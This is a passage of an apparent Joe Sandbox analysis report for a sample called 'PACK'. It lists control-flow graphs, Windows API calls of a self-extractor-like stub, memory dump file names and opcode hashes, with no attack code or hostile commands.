                                                                                                                                                                            • Instruction ID: 0eb2eeff34a7f761f1dcb20b33a45ffb9b48e67174132b75df4c9cc724e5f310
                                                                                                                                                                            • Opcode Fuzzy Hash: 30469f34f7008206d2acd611bc528ea78b40b076c528cad3307d234b585b4bef
                                                                                                                                                                            • Instruction Fuzzy Hash: 4BF0BD71D01229AB8B319BE6AC4CDEB7F6CEE05261B008519F559D2008EB69E505D7B1

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 1011 fe9a32-fe9a51 GetClassNameW 1012 fe9a79-fe9a7b 1011->1012 1013 fe9a53-fe9a68 call fe1410 1011->1013 1014 fe9a7d-fe9a80 SHAutoComplete 1012->1014 1015 fe9a86-fe9a8a 1012->1015 1018 fe9a6a-fe9a76 FindWindowExW 1013->1018 1019 fe9a78 1013->1019 1014->1015 1018->1019 1019->1012
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetClassNameW.USER32(?,?,00000050), ref: 00FE9A49
                                                                                                                                                                            • SHAutoComplete.SHLWAPI(?,00000010), ref: 00FE9A80
                                                                                                                                                                              • Part of subcall function 00FE1410: CompareStringW.KERNEL32(00000400,00001001,00000000,000000FF,?,000000FF,00FDACFE,?,?,?,00FDACAD,?,-00000002,?,00000000,?), ref: 00FE1426
                                                                                                                                                                            • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 00FE9A70
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AutoClassCompareCompleteFindNameStringWindow
                                                                                                                                                                            • String ID: EDIT
                                                                                                                                                                            • API String ID: 4243998846-3080729518
                                                                                                                                                                            • Opcode ID: 0235a5a99aab357a0cc88c19ba27c2936548d230036e008feba65a0f406d9f9f
                                                                                                                                                                            • Instruction ID: 7d35935fd27afbb8bf8fe9c5f0643bca258dfb06782440b6a01f445d76ff0a97
                                                                                                                                                                            • Opcode Fuzzy Hash: 0235a5a99aab357a0cc88c19ba27c2936548d230036e008feba65a0f406d9f9f
                                                                                                                                                                            • Instruction Fuzzy Hash: DAF0E932A0521877E6319AA69C05FFB776C9F46B50F040166BD80A31C0D7A8990187F5

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 1020 fec891-fec8bc call fed940 SetEnvironmentVariableW call fdf835 1024 fec8c1-fec8c5 1020->1024 1025 fec8e9-fec8ed 1024->1025 1026 fec8c7-fec8cb 1024->1026 1027 fec8d4-fec8db call fdf94c 1026->1027 1030 fec8cd-fec8d3 1027->1030 1031 fec8dd-fec8e3 SetEnvironmentVariableW 1027->1031 1030->1027 1031->1025
                                                                                                                                                                            APIs
                                                                                                                                                                            • SetEnvironmentVariableW.KERNEL32(sfxcmd,?), ref: 00FEC8A7
                                                                                                                                                                            • SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00FEC8E3
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: EnvironmentVariable
                                                                                                                                                                            • String ID: sfxcmd$sfxpar
                                                                                                                                                                            • API String ID: 1431749950-3493335439
                                                                                                                                                                            • Opcode ID: a0c6cf52328a6bd30bf72427ac3752262634695ffdd405e68fdbdd6b07c9b8d2
                                                                                                                                                                            • Instruction ID: bdc1b72f0a8a320e34af35adfb438bab8dc73890266d9b82db9f1e99d36410b1
                                                                                                                                                                            • Opcode Fuzzy Hash: a0c6cf52328a6bd30bf72427ac3752262634695ffdd405e68fdbdd6b07c9b8d2
                                                                                                                                                                            • Instruction Fuzzy Hash: AEF0A772800225AAD7223FD39C09FEA7B6CAF14751F040057FD849A142DA659942E7F2

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 1032 fd964a-fd9656 1033 fd9658-fd9660 GetStdHandle 1032->1033 1034 fd9663-fd967a ReadFile 1032->1034 1033->1034 1035 fd967c-fd9685 call fd9745 1034->1035 1036 fd96d6 1034->1036 1040 fd969e-fd96a2 1035->1040 1041 fd9687-fd968f 1035->1041 1038 fd96d9-fd96de 1036->1038 1042 fd96a4-fd96ad GetLastError 1040->1042 1043 fd96b3-fd96b7 1040->1043 1041->1040 1044 fd9691 1041->1044 1042->1043 1046 fd96af-fd96b1 1042->1046 1047 fd96b9-fd96c1 1043->1047 1048 fd96d1-fd96d4 1043->1048 1045 fd9692-fd969c call fd964a 1044->1045 1045->1038 1046->1038 1047->1048 1050 fd96c3-fd96cc GetLastError 1047->1050 1048->1038 1050->1048 1052 fd96ce-fd96cf 1050->1052 1052->1045
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetStdHandle.KERNEL32(000000F6), ref: 00FD965A
                                                                                                                                                                            • ReadFile.KERNEL32(?,?,00000001,?,00000000), ref: 00FD9672
                                                                                                                                                                            • GetLastError.KERNEL32 ref: 00FD96A4
                                                                                                                                                                            • GetLastError.KERNEL32 ref: 00FD96C3
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ErrorLast$FileHandleRead
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2244327787-0
                                                                                                                                                                            • Opcode ID: 1155398c652d8a584c385a2fcbb736f617133965b0d988b6c714786f3ba4d196
                                                                                                                                                                            • Instruction ID: 6b59849bea7362c3fcf540522044c5df7813d7c116486eaa7fb09652fee5820e
                                                                                                                                                                            • Opcode Fuzzy Hash: 1155398c652d8a584c385a2fcbb736f617133965b0d988b6c714786f3ba4d196
                                                                                                                                                                            • Instruction Fuzzy Hash: 9F115E31908208EFDB219AD08944B69779BAB04331F14C52BF96686380DBB9CD40EF51
                                                                                                                                                                            APIs
                                                                                                                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00FF2E0F,00000000,00000000,?,00FF99D3,00FF2E0F,00000000,00000000,00000000,?,00FF9BD0,00000006,FlsSetValue), ref: 00FF9A5E
                                                                                                                                                                            • GetLastError.KERNEL32(?,00FF99D3,00FF2E0F,00000000,00000000,00000000,?,00FF9BD0,00000006,FlsSetValue,01006058,01006060,00000000,00000364,?,00FF85E8), ref: 00FF9A6A
                                                                                                                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00FF99D3,00FF2E0F,00000000,00000000,00000000,?,00FF9BD0,00000006,FlsSetValue,01006058,01006060,00000000), ref: 00FF9A78
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3177248105-0
                                                                                                                                                                            • Opcode ID: 27a6241bb20d84bf7fe7f6a0316b6c8faf54dfb09d6136ccadc1d0f9ef709380
                                                                                                                                                                            • Instruction ID: c312cfc11ffc624965a6483120ea3c5415b03ba64d79d437cc55c20cbcd7b609
                                                                                                                                                                            • Opcode Fuzzy Hash: 27a6241bb20d84bf7fe7f6a0316b6c8faf54dfb09d6136ccadc1d0f9ef709380
                                                                                                                                                                            • Instruction Fuzzy Hash: 3E01F736A4922BABC7328B689C48B767798BF457B0B110221FE86D3144D77AD801DBE0
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00FFA446: GetOEMCP.KERNEL32(00000000,?,?,00FFA6CF,?), ref: 00FFA471
                                                                                                                                                                            • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,00FFA714,?,00000000), ref: 00FFA8E7
                                                                                                                                                                            • GetCPInfo.KERNEL32(00000000,00FFA714,?,?,?,00FFA714,?,00000000), ref: 00FFA8FA
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CodeInfoPageValid
                                                                                                                                                                            • String ID: 6P+
                                                                                                                                                                            • API String ID: 546120528-3080146196
                                                                                                                                                                            • Opcode ID: b8a24dbc36e2823f9a32e3b61b44522db2684f37ca71a2c2f6f2c02586e30e7e
                                                                                                                                                                            • Instruction ID: 10350e3df21557c72a609e9f8c6025a9c8429fd4da6ce7de80aae56d7fc5fd5b
                                                                                                                                                                            • Opcode Fuzzy Hash: b8a24dbc36e2823f9a32e3b61b44522db2684f37ca71a2c2f6f2c02586e30e7e
                                                                                                                                                                            • Instruction Fuzzy Hash: 5C5158F0D002499EDB31CF71C8856BABBE5AF41320F14807ED29E87271E6B99545EB92
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 00FFA543
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Info
                                                                                                                                                                            • String ID: $ 6P+
                                                                                                                                                                            • API String ID: 1807457897-352108377
                                                                                                                                                                            • Opcode ID: f5f6711f2d20e19b23a4f76e61bee21db532bd368678972a3c81766722ec2cf0
                                                                                                                                                                            • Instruction ID: 119e2c577e2af5bfa90665322e38bda213eb1e7710ff6f2a06489464ad014738
                                                                                                                                                                            • Opcode Fuzzy Hash: f5f6711f2d20e19b23a4f76e61bee21db532bd368678972a3c81766722ec2cf0
                                                                                                                                                                            • Instruction Fuzzy Hash: 8F41F7B190424C9ADB228F64CC84BFABBA9DF55304F1C04ECE69EC6152D2359A45AF21
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00FDE7E3: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00FDE802
                                                                                                                                                                              • Part of subcall function 00FDE7E3: GetProcAddress.KERNEL32(01017350,CryptUnprotectMemory), ref: 00FDE812
                                                                                                                                                                            • GetCurrentProcessId.KERNEL32(?,?,?,00FDE85C), ref: 00FDE8E3
                                                                                                                                                                            Strings
                                                                                                                                                                            • CryptUnprotectMemory failed, xrefs: 00FDE8DB
                                                                                                                                                                            • CryptProtectMemory failed, xrefs: 00FDE8A3
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AddressProc$CurrentProcess
                                                                                                                                                                            • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                                                                                                                                                                            • API String ID: 2190909847-396321323
                                                                                                                                                                            • Opcode ID: 8bd90cbbcd76e333dc892d29fec2a2426d42498bf0ee54c3e2ee491d2632a579
                                                                                                                                                                            • Instruction ID: a3fc4a65641c5e0be881ecdd87d51f055d3a9b7e49cc1fd7adda0a561e9b08bc
                                                                                                                                                                            • Opcode Fuzzy Hash: 8bd90cbbcd76e333dc892d29fec2a2426d42498bf0ee54c3e2ee491d2632a579
                                                                                                                                                                            • Instruction Fuzzy Hash: 0F112B31B0120517EB11BA39CC55B6E778BDF44B64F0C802BF880DE386DB69DD40B2A1
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00FF99F0
                                                                                                                                                                            • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00FF99FD
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AddressProc__crt_fast_encode_pointer
                                                                                                                                                                            • String ID: 6P+
                                                                                                                                                                            • API String ID: 2279764990-3080146196
                                                                                                                                                                            • Opcode ID: d4fe9e8022c00edde94af4c3e662030b2db9b639d4a981c0fa904745366f68ba
                                                                                                                                                                            • Instruction ID: c42f83b46e7e8030375832e6d76d95ed13d3de2b7c509f7a16e0d12ee796e8ab
                                                                                                                                                                            • Opcode Fuzzy Hash: d4fe9e8022c00edde94af4c3e662030b2db9b639d4a981c0fa904745366f68ba
                                                                                                                                                                            • Instruction Fuzzy Hash: 26110A33E0512A5B9F36DE69DC40A7A73A5AF843307174120FE54AB2A8D7B9DC41E7E0
                                                                                                                                                                            APIs
                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00010000,Function_0001062F,?,00000000,00000000), ref: 00FE0519
                                                                                                                                                                            • SetThreadPriority.KERNEL32(?,00000000), ref: 00FE0560
                                                                                                                                                                              • Part of subcall function 00FD6CCE: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00FD6CEC
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Thread$CreatePriority__vswprintf_c_l
                                                                                                                                                                            • String ID: CreateThread failed
                                                                                                                                                                            • API String ID: 2655393344-3849766595
                                                                                                                                                                            • Opcode ID: 250823155a18fbbb702b7a5bd9f4f19822fcc9849b32cca59b656f494dab6138
                                                                                                                                                                            • Instruction ID: a179138d1a0aba22f559f8f676c7e9bad99142752882d360f3d4687fb724496d
                                                                                                                                                                            • Opcode Fuzzy Hash: 250823155a18fbbb702b7a5bd9f4f19822fcc9849b32cca59b656f494dab6138
                                                                                                                                                                            • Instruction Fuzzy Hash: 31017DB13443016FD230AF52EC45F6B3399EB40751F24042EF6C2A6289CEE568C0DB30
                                                                                                                                                                            APIs
                                                                                                                                                                            • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,31E85006,00000001,?,000000FF), ref: 00FF9CD5
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: String
                                                                                                                                                                            • String ID: 6P+$LCMapStringEx
                                                                                                                                                                            • API String ID: 2568140703-157081382
                                                                                                                                                                            • Opcode ID: 9cb318d1115fbdd6c8200cf43eb451c79f5ac3ab37c852f9b0742063cf54b51e
                                                                                                                                                                            • Instruction ID: 421ae8469cbec8a855039b347179a0d4435f780e74e5b46bb440ba4490a997d1
                                                                                                                                                                            • Opcode Fuzzy Hash: 9cb318d1115fbdd6c8200cf43eb451c79f5ac3ab37c852f9b0742063cf54b51e
                                                                                                                                                                            • Instruction Fuzzy Hash: D201D33254420DBBDF22AF91DD05EAE3FA6FF08760F014518FE5426160CA778931EB90
                                                                                                                                                                            APIs
                                                                                                                                                                            • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,00FF9291), ref: 00FF9C4D
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CountCriticalInitializeSectionSpin
                                                                                                                                                                            • String ID: 6P+$InitializeCriticalSectionEx
                                                                                                                                                                            • API String ID: 2593887523-3301944762
                                                                                                                                                                            • Opcode ID: 4fdf3018fdb7b737f5ea7e1f8f9a63a33c67681ce141a5b4e487d8e4134ee37a
                                                                                                                                                                            • Instruction ID: f23bd8e7a0d217dfa770a63fc06e3a4108243640f8db0251ad482d1c3d3dc668
                                                                                                                                                                            • Opcode Fuzzy Hash: 4fdf3018fdb7b737f5ea7e1f8f9a63a33c67681ce141a5b4e487d8e4134ee37a
                                                                                                                                                                            • Instruction Fuzzy Hash: 92F0B431A4520CFBCB22AF92DC05DAE7FA1EF08720F014018FE445B160CAB68A20EB90
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Alloc
                                                                                                                                                                            • String ID: 6P+$FlsAlloc
                                                                                                                                                                            • API String ID: 2773662609-438482471
                                                                                                                                                                            • Opcode ID: 2eab4652583afea0af47f3e0de72334fcf33988fc59e35716e53318b7b497a03
                                                                                                                                                                            • Instruction ID: 5fb34ac863904787debe2835d5ccc72481112ebe5e0e98afad5926ba5e49d1a2
                                                                                                                                                                            • Opcode Fuzzy Hash: 2eab4652583afea0af47f3e0de72334fcf33988fc59e35716e53318b7b497a03
                                                                                                                                                                            • Instruction Fuzzy Hash: 36E0A731E4521C679632BB929C05A6F7B65DF04710F014059FE4557240CDAA5D1097D5
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetStdHandle.KERNEL32(000000F5,?,?,00FDC90A,00000001,?,?,?,00000000,00FE4AF4,?,?,?,?,?,00FE4599), ref: 00FD9C4F
                                                                                                                                                                            • WriteFile.KERNEL32(?,00000000,?,00FE47A1,00000000,?,?,00000000,00FE4AF4,?,?,?,?,?,00FE4599,?), ref: 00FD9C8F
                                                                                                                                                                            • WriteFile.KERNEL32(?,00000000,?,00FE47A1,00000000,?,00000001,?,?,00FDC90A,00000001,?,?,?,00000000,00FE4AF4), ref: 00FD9CBC
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
